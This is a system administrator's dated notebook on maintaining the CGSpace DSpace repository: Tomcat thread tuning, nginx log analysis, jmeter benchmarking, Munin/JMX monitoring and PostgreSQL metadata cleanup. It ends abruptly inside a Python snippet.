+        at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)
+        at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
+        at java.lang.reflect.Method.invoke(Method.java:498)
+        at org.dspace.app.launcher.ScriptLauncher.runOneCommand(ScriptLauncher.java:226)
+        at org.dspace.app.launcher.ScriptLauncher.main(ScriptLauncher.java:78)
+ 
+real    7m2.241s
+user    1m33.198s
+sys     0m12.317s
+
  • I tested the abstract cleanups that I had started on Bioversity’s Journal Articles collection a few days ago
  • In the end there were 324 items in the collection that were Limited Access, but only 199 had abstracts
  • I want to document the workflow of adding a production PostgreSQL database to a development instance of DSpace in Docker:

$ docker exec dspace_db dropdb -U postgres dspace
+$ docker exec dspace_db createdb -U postgres -O dspace --encoding=UNICODE dspace
+$ docker exec dspace_db psql -U postgres dspace -c 'alter user dspace createuser;'
+$ docker cp test.dump dspace_db:/tmp/test.dump
+$ docker exec dspace_db pg_restore -U postgres -d dspace /tmp/test.dump
+$ docker exec dspace_db psql -U postgres dspace -c 'alter user dspace nocreateuser;'
+$ docker exec dspace_db vacuumdb -U postgres dspace
+$ docker cp ~/src/git/DSpace/dspace/etc/postgres/update-sequences.sql dspace_db:/tmp
+$ docker exec dspace_db psql -U dspace -f /tmp/update-sequences.sql dspace
+

2018-01-22

  • Look over Udana’s CSV of 25 WLE records from last week
  • I sent him some corrections (a few of these checks are easy to script, see the sketch after this list):
    • The file encoding is Windows-1252
    • There were whitespace issues in the dc.identifier.citation field (spaces at the beginning and end, and multiple spaces between some words)
    • Also, the authors listed in the citation need to be in normal format, separated by commas or colons (however you prefer), not with ||
    • There were spaces at the beginning and end of some cg.identifier.doi fields
    • Make sure that the cg.coverage.countries field contains only countries: ie, no “SOUTH ETHIOPIA” or “EAST AFRICA” (the first should just be ETHIOPIA, the second should go in cg.coverage.region instead)
    • The current list of regions we use is here: https://github.com/ilri/DSpace/blob/5_x-prod/dspace/config/input-forms.xml#L5162
    • You have a syntax error in your cg.coverage.regions (an extra ||)
    • The value of dc.identifier.issn should just be the ISSN, but you have: eISSN: 1479-487X
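
A rough sketch of how a few of those checks could be scripted. This is a hypothetical helper, assuming the CSV has already been re-saved as UTF-8 and uses the column names mentioned above:

#!/usr/bin/env python3
# Flag a few common problems in a metadata CSV: stray whitespace,
# malformed ISSNs, and "||" in fields that should not be multi-value.
# Hypothetical helper; column names are the ones discussed above.
import csv
import re
import sys

issn_pattern = re.compile(r"^[0-9]{4}-[0-9]{3}[0-9Xx]$")

with open(sys.argv[1], newline="", encoding="utf-8") as f:
    for i, row in enumerate(csv.DictReader(f), start=2):
        for field in ("dc.identifier.citation", "cg.identifier.doi"):
            value = row.get(field, "")
            if value != value.strip() or "  " in value:
                print(f"row {i}: whitespace issue in {field}")
        if "||" in row.get("dc.identifier.citation", ""):
            print(f"row {i}: citation contains ||")
        issn = row.get("dc.identifier.issn", "").strip()
        if issn and not issn_pattern.match(issn):
            print(f"row {i}: suspicious ISSN: {issn}")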
  • I wrote a quick Python script that uses the DSpace REST API to find all collections under a given community
  • The source code is here: rest-find-collections.py
  • Peter had said that he found a bunch of ILRI collections that were called “untitled”, but I don’t see any:

$ ./rest-find-collections.py 10568/1 | wc -l
+308
+$ ./rest-find-collections.py 10568/1 | grep -i untitled
+
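
The real script is linked above; for illustration, the general approach looks something like this. It is only a sketch against the DSpace 5 REST API, assuming the /rest/handle and /rest/communities endpoints and that the community handle is passed as the first argument:

#!/usr/bin/env python3
# Recursively list collections under a community, given its handle.
# Illustrative sketch only (assumes the DSpace 5 REST API layout).
import sys
import requests

BASE = "https://cgspace.cgiar.org/rest"

def collections_in(community_id):
    r = requests.get(f"{BASE}/communities/{community_id}/collections", timeout=60)
    r.raise_for_status()
    for collection in r.json():
        print(collection["name"])
    # descend into sub-communities as well
    r = requests.get(f"{BASE}/communities/{community_id}/communities", timeout=60)
    r.raise_for_status()
    for sub in r.json():
        collections_in(sub["id"])

if __name__ == "__main__":
    handle = sys.argv[1]  # for example: 10568/1
    community = requests.get(f"{BASE}/handle/{handle}", timeout=60).json()
    collections_in(community["id"])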
  • Looking at the Tomcat connector docs I think we really need to increase maxThreads
  • The default is 200, which can easily be taken up by bots, considering that Google and Bing sometimes browse with fifty (50) connections each!
  • Before I increase this I want to see if I can measure and graph this, and then benchmark
  • I’ll probably also increase minSpareThreads to 20 (its default is 10)
  • I still want to bump up acceptorThreadCount from 1 to 2 as well, as the documentation says this should be increased on multi-core systems
  • I spent quite a bit of time looking at jvisualvm and jconsole today
  • Run system updates on DSpace Test and reboot it
  • I see I can monitor the number of Tomcat threads and some detailed JVM memory stuff if I install munin-plugins-java
  • I’d still like to get arbitrary mbeans like activeSessions etc, though
  • I can’t remember if I had to configure the jmx settings in /etc/munin/plugin-conf.d/munin-node or not; I think all I did was re-run the munin-node-configure script and of course enable JMX in Tomcat’s JVM options


2018-01-23

  • Thinking about generating a jmeter test plan for DSpace, along the lines of Georgetown’s dspace-performance-test
  • I got a list of all the GET requests on CGSpace for January 21st (the last time Linode complained the load was high), excluding admin calls:

# zcat --force /var/log/nginx/access.log.2.gz /var/log/nginx/access.log.3.gz /var/log/nginx/library-access.log.2.gz /var/log/nginx/library-access.log.3.gz /var/log/nginx/rest.log.2.gz /var/log/nginx/rest.log.3.gz /var/log/nginx/oai.log.2.gz /var/log/nginx/oai.log.3.gz /var/log/nginx/error.log.2.gz /var/log/nginx/error.log.3.gz | grep "21/Jan/2018" | grep "GET " | grep -c -v "/admin"
+56405
+
  • Apparently about 28% of these requests were for bitstreams, 30% for the REST API, and 30% for handles:

# zcat --force /var/log/nginx/access.log.2.gz /var/log/nginx/access.log.3.gz /var/log/nginx/library-access.log.2.gz /var/log/nginx/library-access.log.3.gz /var/log/nginx/rest.log.2.gz /var/log/nginx/rest.log.3.gz /var/log/nginx/oai.log.2.gz /var/log/nginx/oai.log.3.gz /var/log/nginx/error.log.2.gz /var/log/nginx/error.log.3.gz | grep "21/Jan/2018" | grep "GET " | grep -v "/admin" | awk '{print $7}' | grep -Eo "^/(handle|bitstream|rest|oai)/" | sort | uniq -c | sort -n
+     38 /oai/
+  14406 /bitstream/
+  15179 /rest/
+  15191 /handle/
+
  • And 3% were to the homepage or search:

# zcat --force /var/log/nginx/access.log.2.gz /var/log/nginx/access.log.3.gz /var/log/nginx/library-access.log.2.gz /var/log/nginx/library-access.log.3.gz /var/log/nginx/rest.log.2.gz /var/log/nginx/rest.log.3.gz /var/log/nginx/oai.log.2.gz /var/log/nginx/oai.log.3.gz /var/log/nginx/error.log.2.gz /var/log/nginx/error.log.3.gz | grep "21/Jan/2018" | grep "GET " | grep -v "/admin" | awk '{print $7}' | grep -Eo '^/($|open-search|discover)' | sort | uniq -c
+   1050 /
+    413 /discover
+    170 /open-search
+
  • The last 10% or so seem to be for static assets that would be served by nginx anyways:

# zcat --force /var/log/nginx/access.log.2.gz /var/log/nginx/access.log.3.gz /var/log/nginx/library-access.log.2.gz /var/log/nginx/library-access.log.3.gz /var/log/nginx/rest.log.2.gz /var/log/nginx/rest.log.3.gz /var/log/nginx/oai.log.2.gz /var/log/nginx/oai.log.3.gz /var/log/nginx/error.log.2.gz /var/log/nginx/error.log.3.gz | grep "21/Jan/2018" | grep "GET " | grep -v "/admin" | awk '{print $7}' | grep -v bitstream | grep -Eo '\.(js|css|png|jpg|jpeg|php|svg|gif|txt|map)$' | sort | uniq -c | sort -n
+      2 .gif
+      7 .css
+     84 .js
+    433 .php
+    882 .txt
+   2551 .png
+
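
For building the test plan it might be handy to get all of these proportions in one pass; here is a rough sketch (a hypothetical helper that reads already-decompressed logs) that tallies GET requests by path category:

#!/usr/bin/env python3
# Tally GET requests by path category from one or more nginx access logs
# (decompress rotated .gz files first), to help weight jmeter samplers.
import re
import sys
from collections import Counter

categories = Counter()
request_re = re.compile(r'"GET (\S+) HTTP')
known = ("handle", "bitstream", "rest", "oai", "discover", "open-search")

for path in sys.argv[1:]:
    with open(path, encoding="utf-8", errors="replace") as f:
        for line in f:
            m = request_re.search(line)
            if not m or m.group(1).startswith("/admin"):
                continue
            prefix = m.group(1).lstrip("/").split("/", 1)[0].split("?", 1)[0]
            if prefix == "":
                categories["homepage"] += 1
            elif prefix in known:
                categories[prefix] += 1
            else:
                categories["other"] += 1

for category, count in categories.most_common():
    print(f"{count:8d} {category}")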
  • I can definitely design a test plan on this!

2018-01-24

  • Looking at the REST requests, most of them are to expand all or metadata, but 5% are for retrieving bitstreams:

# zcat --force /var/log/nginx/access.log.3.gz /var/log/nginx/access.log.4.gz /var/log/nginx/library-access.log.3.gz /var/log/nginx/library-access.log.4.gz /var/log/nginx/rest.log.3.gz /var/log/nginx/rest.log.4.gz /var/log/nginx/oai.log.3.gz /var/log/nginx/oai.log.4.gz /var/log/nginx/error.log.3.gz /var/log/nginx/error.log.4.gz | grep "21/Jan/2018" | grep "GET " | grep -v "/admin" | awk '{print $7}' | grep -E "^/rest" | grep -Eo "(retrieve|expand=[a-z].*)" | sort | uniq -c | sort -n
+      1 expand=collections
+     16 expand=all&limit=1
+     45 expand=items
+    775 retrieve
+   5675 expand=all
+   8633 expand=metadata
+
  • I finished creating the test plan for DSpace Test and ran it from my Linode with:

$ jmeter -n -t DSpacePerfTest-dspacetest.cgiar.org.jmx -l 2018-01-24-1.jtl
+
  • Atmire responded to my issue from two weeks ago and said they will start looking into DSpace 5.8 compatibility for CGSpace
  • I set up a new Arch Linux Linode instance with 8192 MB of RAM and ran the test plan a few times to get a baseline:

# lscpu
+Architecture:        x86_64
+CPU op-mode(s):      32-bit, 64-bit
+Byte Order:          Little Endian
+CPU(s):              4
+On-line CPU(s) list: 0-3
+Thread(s) per core:  1
+Core(s) per socket:  1
+Socket(s):           4
+NUMA node(s):        1
+Vendor ID:           GenuineIntel
+CPU family:          6
+Model:               63
+Model name:          Intel(R) Xeon(R) CPU E5-2680 v3 @ 2.50GHz
+Stepping:            2
+CPU MHz:             2499.994
+BogoMIPS:            5001.32
+Hypervisor vendor:   KVM
+Virtualization type: full
+L1d cache:           32K
+L1i cache:           32K
+L2 cache:            4096K
+L3 cache:            16384K
+NUMA node0 CPU(s):   0-3
+Flags:               fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush mmx fxsr sse sse2 ss syscall nx pdpe1gb rdtscp lm constant_tsc arch_perfmon rep_good nopl xtopology cpuid pni pclmulqdq ssse3 fma cx16 pcid sse4_1 sse4_2 x2apic movbe popcnt tsc_deadline_timer aes xsave avx f16c rdrand hypervisor lahf_lm abm cpuid_fault invpcid_single pti retpoline fsgsbase tsc_adjust bmi1 avx2 smep bmi2 erms invpcid xsaveopt arat
+# free -m
+              total        used        free      shared  buff/cache   available
+Mem:           7970         107        7759           1         103        7771
+Swap:           255           0         255
+# pacman -Syu
+# pacman -S git wget jre8-openjdk-headless mosh htop tmux
+# useradd -m test
+# su - test
+$ git clone -b ilri https://github.com/alanorth/dspace-performance-test.git
+$ wget http://www-us.apache.org/dist//jmeter/binaries/apache-jmeter-3.3.tgz
+$ tar xf apache-jmeter-3.3.tgz
+$ cd apache-jmeter-3.3/bin
+$ ./jmeter -n -t ~/dspace-performance-test/DSpacePerfTest-dspacetest.cgiar.org.jmx -l ~/dspace-performance-test/2018-01-24-linode5451120-baseline.jtl -j ~/dspace-performance-test/2018-01-24-linode5451120-baseline.log
+$ ./jmeter -n -t ~/dspace-performance-test/DSpacePerfTest-dspacetest.cgiar.org.jmx -l ~/dspace-performance-test/2018-01-24-linode5451120-baseline2.jtl -j ~/dspace-performance-test/2018-01-24-linode5451120-baseline2.log
+$ ./jmeter -n -t ~/dspace-performance-test/DSpacePerfTest-dspacetest.cgiar.org.jmx -l ~/dspace-performance-test/2018-01-24-linode5451120-baseline3.jtl -j ~/dspace-performance-test/2018-01-24-linode5451120-baseline3.log
+
  • Then I generated reports for these runs like this:

$ jmeter -g 2018-01-24-linode5451120-baseline.jtl -o 2018-01-24-linode5451120-baseline
+

2018-01-25

  • Run another round of tests on DSpace Test with jmeter after changing Tomcat’s minSpareThreads to 20 (default is 10) and acceptorThreadCount to 2 (default is 1):

$ ./jmeter -n -t ~/dspace-performance-test/DSpacePerfTest-dspacetest.cgiar.org.jmx -l ~/dspace-performance-test/2018-01-25-linode5451120-tomcat-threads.jtl -j ~/dspace-performance-test/2018-01-25-linode5451120-tomcat-threads.log
+$ ./jmeter -n -t ~/dspace-performance-test/DSpacePerfTest-dspacetest.cgiar.org.jmx -l ~/dspace-performance-test/2018-01-25-linode5451120-tomcat-threads2.jtl -j ~/dspace-performance-test/2018-01-25-linode5451120-tomcat-threads2.log
+$ ./jmeter -n -t ~/dspace-performance-test/DSpacePerfTest-dspacetest.cgiar.org.jmx -l ~/dspace-performance-test/2018-01-25-linode5451120-tomcat-threads3.jtl -j ~/dspace-performance-test/2018-01-25-linode5451120-tomcat-threads3.log
+
  • I changed the parameters back to the baseline ones and switched the Tomcat JVM garbage collector to G1GC and re-ran the tests
  • JVM options for Tomcat changed from -Xms3072m -Xmx3072m -XX:+UseConcMarkSweepGC to -Xms3072m -Xmx3072m -XX:+UseG1GC -XX:+PerfDisableSharedMem

$ ./jmeter -n -t ~/dspace-performance-test/DSpacePerfTest-dspacetest.cgiar.org.jmx -l ~/dspace-performance-test/2018-01-25-linode5451120-g1gc.jtl -j ~/dspace-performance-test/2018-01-25-linode5451120-g1gc.log
+$ ./jmeter -n -t ~/dspace-performance-test/DSpacePerfTest-dspacetest.cgiar.org.jmx -l ~/dspace-performance-test/2018-01-25-linode5451120-g1gc2.jtl -j ~/dspace-performance-test/2018-01-25-linode5451120-g1gc2.log
+$ ./jmeter -n -t ~/dspace-performance-test/DSpacePerfTest-dspacetest.cgiar.org.jmx -l ~/dspace-performance-test/2018-01-25-linode5451120-g1gc3.jtl -j ~/dspace-performance-test/2018-01-25-linode5451120-g1gc3.log
+
  • I haven’t had time to look at the results yet

2018-01-26

  • Peter followed up about some of the points from the Skype meeting last week
  • Regarding the ORCID field issue, I see ICARDA’s MELSpace is using cg.creator.ID: 0000-0001-9156-7691
  • I had floated the idea of using a controlled vocabulary with values formatted something like: Orth, Alan S. (0000-0002-1735-7458)
  • Update PostgreSQL JDBC driver version from 42.1.4 to 42.2.1 on DSpace Test, see: https://jdbc.postgresql.org/
  • Reboot DSpace Test to get new Linode kernel (Linux 4.14.14-x86_64-linode94)
  • I am testing my old work on the dc.rights field; I had added a branch for it a few months ago
  • I added a list of Creative Commons and other licenses in input-forms.xml
  • The problem is that Peter wanted to use two questions, one for CG centers and one for others, but using the same metadata value, which isn’t possible (?)
  • So I used some creativity and made several fields that display values but don’t store any, ie:

<pair>
+  <displayed-value>For products published by another party:</displayed-value>
+  <stored-value></stored-value>
+</pair>
+
  • I was worried that if a user selected this field for some reason, DSpace would store an empty value, but it simply doesn’t register it as a valid option:

Rights

  • I submitted a test item with ORCiDs and dc.rights from a controlled vocabulary on DSpace Test: https://dspacetest.cgiar.org/handle/10568/97703
  • I will send it to Peter to check and give feedback (ie, about the ORCiD field name as well as allowing users to add ORCiDs manually or not)

2018-01-28

  • Assist Udana from WLE again to proof his 25 records and upload them to DSpace Test
  • I am playing with the startStopThreads="0" parameter in Tomcat <Engine> and <Host> configuration
  • It reduces the startup time of Catalina by using multiple threads to start web applications in parallel
  • On my local test machine the startup time went from 70 to 30 seconds
  • See: https://tomcat.apache.org/tomcat-7.0-doc/config/host.html

2018-01-29

  • CGSpace went down this morning for a few minutes, according to UptimeRobot
  • Looking at the DSpace logs I see this error happened just before UptimeRobot noticed it going down:

2018-01-29 05:30:22,226 INFO  org.dspace.usage.LoggerUsageEventListener @ anonymous:session_id=3775D4125D28EF0C691B08345D905141:ip_addr=68.180.229.254:view_item:handle=10568/71890
+2018-01-29 05:30:22,322 ERROR org.dspace.app.xmlui.aspect.discovery.AbstractSearch @ org.apache.solr.search.SyntaxError: Cannot parse 'dateIssued_keyword:[1994+TO+1999]': Encountered " "]" "] "" at line 1, column 32.
+Was expecting one of:
+    "TO" ...
+    <RANGE_QUOTED> ...
+    <RANGE_GOOP> ...
+    
+org.dspace.discovery.SearchServiceException: org.apache.solr.search.SyntaxError: Cannot parse 'dateIssued_keyword:[1994+TO+1999]': Encountered " "]" "] "" at line 1, column 32.
+Was expecting one of:
+    "TO" ...
+    <RANGE_QUOTED> ...
+    <RANGE_GOOP> ...
+
  • So is this an error caused by this particular client (which happens to be Yahoo! Slurp)?
  • I see a few dozen HTTP 499 errors in the nginx access log for a few minutes before this happened, but HTTP 499 is just when nginx says that the client closed the request early
  • Perhaps this from the nginx error log is relevant?

2018/01/29 05:26:34 [warn] 26895#26895: *944759 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/16/0000026166 while reading upstream, client: 180.76.15.34, server: cgspace.cgiar.org, request: "GET /bitstream/handle/10947/4658/FISH%20Leaflet.pdf?sequence=12 HTTP/1.1", upstream: "http://127.0.0.1:8443/bitstream/handle/10947/4658/FISH%20Leaflet.pdf?sequence=12", host: "cgspace.cgiar.org"
+

  • Looking at the maximum and average response sizes for successful (HTTP 200) requests in the nginx access log:

# awk '($9 ~ /200/) { i++;sum+=$10;max=$10>max?$10:max; } END { printf("Maximum: %d\nAverage: %d\n",max,i?sum/i:0); }' /var/log/nginx/access.log
+Maximum: 2771268
+Average: 210483
+
  • I guess responses that don’t fit in RAM get saved to disk (a default of 1024M), so this is definitely not the issue here, and that warning is totally unrelated
  • My best guess is that the Solr search error is related somehow but I can’t figure it out
  • We definitely have enough database connections, as I haven’t seen a pool error in weeks:

$ grep -c "Timeout: Pool empty." dspace.log.2018-01-2*
+dspace.log.2018-01-20:0
+dspace.log.2018-01-21:0
+dspace.log.2018-01-22:0
+dspace.log.2018-01-23:0
+dspace.log.2018-01-24:0
+dspace.log.2018-01-25:0
+dspace.log.2018-01-26:0
+dspace.log.2018-01-27:0
+dspace.log.2018-01-28:0
+dspace.log.2018-01-29:0
+
  • Adam Hunt from WLE complained that pages take “1-2 minutes” to load each, from France and Sri Lanka
  • I asked him which particular pages, as right now pages load in 2 or 3 seconds for me
  • UptimeRobot said CGSpace went down again, and I looked at PostgreSQL and saw 211 active database connections
  • If it’s not memory and it’s not the database, it’s gotta be Tomcat threads; seeing as the default maxThreads is only 200 anyways, that actually makes sense
  • I decided to change the Tomcat thread settings on CGSpace (among other things, bumping maxThreads from 200 up to 400)
  • Looks like I only enabled the new thread stuff on the connector used internally by Solr, so I probably need to match that by increasing them on the other connector that nginx proxies to
  • Jesus Christ I need to fucking fix the Munin monitoring so that I can tell how many fucking threads I have running
  • Wow, so apparently you need to specify which connector to check if you want any of the Munin Tomcat plugins besides “tomcat_jvm” to work (the connector name can be seen in the Catalina logs)
  • I modified /etc/munin/plugin-conf.d/tomcat to add the connector (with surrounding quotes!) and now the other plugins work (obviously the credentials are incorrect):

[tomcat_*]
+    env.host 127.0.0.1
+    env.port 8081
+    env.connector "http-bio-127.0.0.1-8443"
+    env.user munin
+    env.password munin
+
  • For example, I can see the threads:

# munin-run tomcat_threads
+busy.value 0
+idle.value 20
+max.value 400
+
  • Apparently you can’t monitor more than one connector, so I guess the most important to monitor would be the one that nginx is sending stuff to
  • So for now I think I’ll just monitor these and skip trying to configure the jmx plugins
  • Although following the logic of /usr/share/munin/plugins/jmx_tomcat_dbpools could be useful for getting the active Tomcat sessions
  • From debugging the jmx_tomcat_db_pools script from the munin-plugins-java package, I see that this is how you call arbitrary mbeans:

# port=5400 ip="127.0.0.1" /usr/bin/java -cp /usr/share/munin/munin-jmx-plugins.jar org.munin.plugin.jmx.Beans Catalina:type=DataSource,class=javax.sql.DataSource,name=* maxActive
+Catalina:type=DataSource,class=javax.sql.DataSource,name="jdbc/dspace"  maxActive       300
+

  • Meanwhile, Tomcat’s catalina.out is full of those progress status lines again:

[===================>                               ]38% time remaining: 5 hour(s) 21 minute(s) 47 seconds. timestamp: 2018-01-29 06:25:16
+
  • There are millions of these status lines, for example in just this one log file:

# zgrep -c "time remaining" /var/log/tomcat7/catalina.out.1.gz
+1084741
+
+

2018-01-31

  • UptimeRobot says CGSpace went down at 7:57 AM, and indeed I see a lot of HTTP 499 codes in nginx logs
  • PostgreSQL activity shows 222 database connections
  • Now PostgreSQL activity shows 265 database connections!
  • I don’t see any errors anywhere…
  • Now PostgreSQL activity shows 308 connections!
  • Well, this is interesting: there are 400 Tomcat threads busy:

# munin-run tomcat_threads
+busy.value 400
+idle.value 0
+max.value 400
+
  • And wow, we finally exhausted the database connections, from dspace.log:

2018-01-31 08:05:28,964 ERROR org.dspace.storage.rdbms.DatabaseManager @ SQL connection Error - 
+org.apache.tomcat.jdbc.pool.PoolExhaustedException: [http-bio-127.0.0.1-8443-exec-451] Timeout: Pool empty. Unable to fetch a connection in 5 seconds, none available[size:300; busy:300; idle:0; lastwait:5000].
+
  • Now even the nightly Atmire background thing is getting an HTTP 500 error:

Jan 31, 2018 8:16:05 AM com.sun.jersey.spi.container.ContainerResponse logException
+SEVERE: Mapped exception to response: 500 (Internal Server Error)
+javax.ws.rs.WebApplicationException
+
  • For now I will restart Tomcat to clear this shit and bring the site back up
  • The top IPs from this morning, between 7 and 8 AM, in XMLUI and REST/OAI:

# cat /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/library-access.log /var/log/nginx/library-access.log.1 /var/log/nginx/error.log /var/log/nginx/error.log.1 | grep -E "31/Jan/2018:(07|08)" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
+     67 66.249.66.70
+     70 207.46.13.12
+     71 197.210.168.174
+     83 207.46.13.13
+     85 157.55.39.79
+     89 207.46.13.14
+    123 68.180.228.157
+    198 66.249.66.90
+    219 41.204.190.40
+    255 2405:204:a208:1e12:132:2a8e:ad28:46c0
+# cat /var/log/nginx/rest.log /var/log/nginx/rest.log.1 /var/log/nginx/oai.log /var/log/nginx/oai.log.1 | grep -E "31/Jan/2018:(07|08)" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
+      2 65.55.210.187
+      2 66.249.66.90
+      3 157.55.39.79
+      4 197.232.39.92
+      4 34.216.252.127
+      6 104.196.152.243
+      6 213.55.85.89
+     15 122.52.115.13
+     16 213.55.107.186
+    596 45.5.184.196
+
  • This looks reasonable to me, so I have no idea why we ran out of Tomcat threads

Tomcat threads

  • We need to start graphing the Tomcat sessions as well, though that requires JMX
  • Also, I wonder if I could disable the nightly Atmire thing
  • God, I don’t know where this load is coming from
  • Since I bumped up the Tomcat threads from 200 to 400 the load on the server has been sustained at about 200% for almost a whole day:

CPU usage week

  • I should make separate database pools for the web applications and the API applications like REST and OAI
  • Ok, so this is interesting: I figured out how to get the MBean path to query Tomcat’s activeSessions from JMX (using munin-plugins-java):

# port=5400 ip="127.0.0.1" /usr/bin/java -cp /usr/share/munin/munin-jmx-plugins.jar org.munin.plugin.jmx.Beans Catalina:type=Manager,context=/,host=localhost activeSessions
+Catalina:type=Manager,context=/,host=localhost  activeSessions  8
+
  • If you connect to Tomcat in jvisualvm it’s pretty obvious when you hover over the elements

MBeans in JVisualVM


February, 2018


2018-02-01

  • Peter gave feedback on the dc.rights proof of concept that I had sent him last week
  • We don’t need to distinguish between internal and external works, so that makes it just a simple list
  • Yesterday I figured out how to monitor DSpace sessions using JMX
  • I copied the logic of the jmx_tomcat_dbpools plugin provided by Ubuntu’s munin-plugins-java package and used the stuff I discovered about JMX in 2018-01

DSpace Sessions

  • Run all system updates and reboot DSpace Test
  • Wow, I packaged up the jmx_dspace_sessions stuff in the Ansible infrastructure scripts and deployed it on CGSpace and it totally works:

# munin-run jmx_dspace_sessions
+v_.value 223
+v_jspui.value 1
+v_oai.value 0
+

2018-02-03

  • Run the latest 12 affiliation deletions and 1,116 affiliation corrections on CGSpace:

$ ./delete-metadata-values.py -i /tmp/2018-02-03-Affiliations-12-deletions.csv -f cg.contributor.affiliation -m 211 -d dspace -u dspace -p 'fuuu'
+$ ./fix-metadata-values.py -i /tmp/2018-02-03-Affiliations-1116-corrections.csv -f cg.contributor.affiliation -t correct -m 211 -d dspace -u dspace -p 'fuuu'
+
  • Then I started a full Discovery reindex:

$ time schedtool -D -e ionice -c2 -n7 nice -n19 [dspace]/bin/dspace index-discovery -b
+
+real    96m39.823s
+user    14m10.975s
+sys     2m29.088s
+
  • Generate a new list of affiliations for Peter to sort through:

dspace=# \copy (select distinct text_value, count(*) as count from metadatavalue where metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = 'contributor' and qualifier = 'affiliation') AND resource_type_id = 2 group by text_value order by count desc) to /tmp/affiliations.csv with csv;
+COPY 3723
+
  • Oh, and it looks like we processed over 3.1 million requests in January, up from 2.9 million in December:

# time zcat --force /var/log/nginx/* | grep -cE "[0-9]{1,2}/Jan/2018"
+3126109
+
+real    0m23.839s
+user    0m27.225s
+sys     0m1.905s
+

2018-02-05

  • Toying with correcting authors with trailing spaces via PostgreSQL:

dspace=# update metadatavalue set text_value=REGEXP_REPLACE(text_value, '\s+$' , '') where resource_type_id=2 and metadata_field_id=3 and text_value ~ '^.*?\s+$';
+UPDATE 20
+
  • I tried the TRIM(TRAILING from text_value) function and it said it changed 20 items but the spaces didn’t go away
  • This is on a fresh import of the CGSpace database, but when I tried to apply it on CGSpace there were no changes detected. Weird.
  • Anyways, Peter wants a new list of authors to clean up, so I exported another CSV:

dspace=# \copy (select distinct text_value, count(*) as count from metadatavalue where metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = 'contributor' and qualifier = 'author') AND resource_type_id = 2 group by text_value order by count desc) to /tmp/authors-2018-02-05.csv with csv;
+COPY 55630
+

2018-02-06

  • UptimeRobot says CGSpace is down this morning around 9:15
  • I see 308 PostgreSQL connections in pg_stat_activity
  • The usage otherwise seemed low for REST/OAI as well as XMLUI in the last hour:

# date
+Tue Feb  6 09:30:32 UTC 2018
+# cat /var/log/nginx/rest.log /var/log/nginx/rest.log.1 /var/log/nginx/oai.log /var/log/nginx/oai.log.1 | grep -E "6/Feb/2018:(08|09)" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
+      2 223.185.41.40
+      2 66.249.64.14
+      2 77.246.52.40
+      4 157.55.39.82
+      4 193.205.105.8
+      5 207.46.13.63
+      5 207.46.13.64
+      6 154.68.16.34
+      7 207.46.13.66
+   1548 50.116.102.77
+# cat /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/library-access.log /var/log/nginx/library-access.log.1 /var/log/nginx/error.log /var/log/nginx/error.log.1 | grep -E "6/Feb/2018:(08|09)" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
+     77 213.55.99.121
+     86 66.249.64.14
+    101 104.196.152.243
+    103 207.46.13.64
+    118 157.55.39.82
+    133 207.46.13.66
+    136 207.46.13.63
+    156 68.180.228.157
+    295 197.210.168.174
+    752 144.76.64.79
+
  • I did notice in /var/log/tomcat7/catalina.out that Atmire’s update thing was running though
  • So I restarted Tomcat and now everything is fine
  • Next time I see that many database connections I need to save the output so I can analyze it later
  • I’m going to re-schedule the taskUpdateSolrStatsMetadata task as Bram detailed in ticket 566 to see if it makes CGSpace stop crashing every morning
  • If I move the task from 3AM to 3PM, ideally CGSpace will stop crashing in the morning, or start crashing ~12 hours later
  • Atmire has said that eventually there will be a fix for this high load caused by their script, but it will come with the 5.8 compatibility work they are already doing
  • I re-deployed CGSpace with the new task time of 3PM, ran all system updates, and restarted the server
  • Also, I changed the name of the DSpace fallback pool on DSpace Test and CGSpace to be called ‘dspaceCli’ so that I can distinguish it in pg_stat_activity
  • I implemented some changes to the pooling in the Ansible infrastructure scripts so that each DSpace web application can use its own pool (web, api, and solr)
  • Each pool uses its own name and hopefully this should help me figure out which one is using too many connections next time CGSpace goes down
  • Also, this will mean that when a search bot comes along and hammers the XMLUI, the REST and OAI applications will be fine
  • I’m not actually sure if the Solr web application uses the database though, so I’ll have to check later and remove it if necessary
  • I deployed the changes on DSpace Test only for now, so I will monitor and make them on CGSpace later this week

2018-02-07

  • Abenet wrote to ask a question about the ORCiD lookup not working for one CIAT user on CGSpace
  • I tried on DSpace Test and indeed the lookup just doesn’t work!
  • The ORCiD code in DSpace appears to be using http://pub.orcid.org/, but when I go there in the browser it redirects me to https://pub.orcid.org/v2.0/
  • According to the announcement the v1 API was moved from http://pub.orcid.org/ to https://pub.orcid.org/v1.2 until March 1st when it will be discontinued for good
  • But the old URL is hardcoded in DSpace and it doesn’t work anyways, because it currently redirects you to https://pub.orcid.org/v2.0/v1.2
  • So I guess we have to disable that shit once and for all and switch to a controlled vocabulary
  • CGSpace crashed again, this time around Wed Feb 7 11:20:28 UTC 2018
  • I took a few snapshots of the PostgreSQL activity at the time and as the minutes went on; the connections were very high at first but reduced on their own:

$ psql -c 'select * from pg_stat_activity' > /tmp/pg_stat_activity.txt
+$ grep -c 'PostgreSQL JDBC' /tmp/pg_stat_activity*
+/tmp/pg_stat_activity1.txt:300
+/tmp/pg_stat_activity2.txt:272
+/tmp/pg_stat_activity3.txt:168
+/tmp/pg_stat_activity4.txt:5
+/tmp/pg_stat_activity5.txt:6
+
  • Interestingly, all of those 751 connections were idle!

$ grep "PostgreSQL JDBC" /tmp/pg_stat_activity* | grep -c idle
+751
+
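
To make the next snapshot easier to analyze, here is a small sketch using psycopg2 that groups pg_stat_activity by application name and state (the connection parameters are assumptions, adjust for the real server):

#!/usr/bin/env python3
# Summarize PostgreSQL connections by application_name and state,
# so a snapshot like the ones above is easier to read at a glance.
# Connection settings here are assumptions; adjust for the real server.
import psycopg2

conn = psycopg2.connect(dbname="dspace", user="postgres", host="localhost")
with conn.cursor() as cursor:
    cursor.execute(
        """
        SELECT application_name, state, count(*)
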